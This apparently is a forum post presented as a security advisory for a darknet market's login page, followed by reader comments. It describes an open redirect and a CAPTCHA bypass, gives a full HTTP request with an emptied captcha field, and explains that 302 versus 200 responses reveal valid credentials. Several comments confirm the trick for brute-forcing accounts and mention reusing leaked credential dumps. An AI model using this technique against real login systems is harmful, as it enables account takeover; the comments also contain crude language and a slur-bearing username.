DHL Security Advisory - URL Redirect & CAPTCHA Bypass

Basically, http://darkheroesq46awl.onion/login suffers from 2 vulnerabilities:

  1. Arbitrary URL Redirect
  2. CAPTCHA Bypass (CWE-203: Information Exposure Through Discrepancy)

The "Arbitrary URL Redirect" affects the POST parameter redirect_to. An attacker can use this to trick you into visiting a phishing site, or worse, deanonymize you.

Regarding "CAPTCHA Bypass" the CAPTCHA parameter in the login POST request is "ct_captcha". If you unset this (NULL value) or simply delete it, then you will get the "302" redirect if and only if the credentials are correct. Below is an example of a request that triggers this vulnerability:

POST /login HTTP/1.1
Host: darkheroesq46awl.onion
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://darkheroesq46awl.onion/register?i=
Cookie: PHPSESSID=a
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

redirect_to=https://www.example.com&username=USERNAME&password=PASSWORD&ct_captcha=&submit=Login+Now

Notice that "ct_captcha" has a null value. When USERNAME and PASSWORD equal a valid pair for an existing user, the HTTP response code is "302". When the pair are invalid (like you guessed a wrong password), the response code is "200".

Using this, it is possible to compromise accounts with shitty passwords very easily.

Be safe,

Your friendly DN Security Consultant.


Comments


[6 Points] poopybutt9000:

How is this not upvoted massively?

Thank you for taking the time to contribute this my friend.


[5 Points] t0mcheck:

..


[4 Points] Lat3ris:

Is it just me , or is this sub entertaining?


[2 Points] None:

I logged in to say thank you as well! Don't want you to think you weren't appreciated (even though I use none of these services and my erection grows softer everyday with shit that comes out on the darknets). There needs to be a subreddit just for this so even if it gets "buried" it's able to be easily found.


[2 Points] None:

Hey I have a good idea, dont use DHL!!


[2 Points] None:

Great post buddy. Keep up the good work!


[2 Points] Christisrealnigga:

Can you imagine how many hits le must be having using ab and hansa dumps lol

Now that I think of it why arent large markets having a huge pass reset (espesically private ones)


[2 Points] sharpshooter789:

The redirect_to parameter isn't a real vulnerability.

However, the captcha bypass does indeed work. It doesn't login to account but, it returns the login prompt with no message. When a bad password is used it tells you. This could be used to brute force accounts.


[1 Points] Invictus-Animus:

Or you can login from the upper bar without the captcha


[1 Points] Bigw0rmer:

This market is getting ripped apart , lol